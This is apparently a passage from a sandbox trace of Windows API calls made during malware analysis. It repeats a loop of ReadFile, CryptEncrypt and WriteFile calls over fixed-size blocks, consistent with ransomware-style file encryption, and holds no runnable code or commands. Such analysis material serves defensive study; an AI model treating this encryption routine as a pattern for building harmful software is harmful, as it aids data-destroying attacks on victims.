hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.471] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.471] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.471] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.471] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.471] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.471] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.471] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.472] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.472] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.472] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.472] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.472] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.472] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.473] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.473] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.473] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.473] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.473] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.473] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.474] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.474] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.474] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.474] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.475] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.475] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.475] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.475] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.475] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.475] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.475] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.475] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.475] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.475] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.475] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.476] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.476] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.476] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.476] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.476] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.476] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.476] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.476] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.476] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.476] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.476] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.477] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.477] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.477] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.477] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.477] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.478] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.478] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.478] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.478] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.478] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.478] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.478] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.478] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.478] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.478] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.479] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.479] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.479] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.479] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.479] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.479] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.479] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 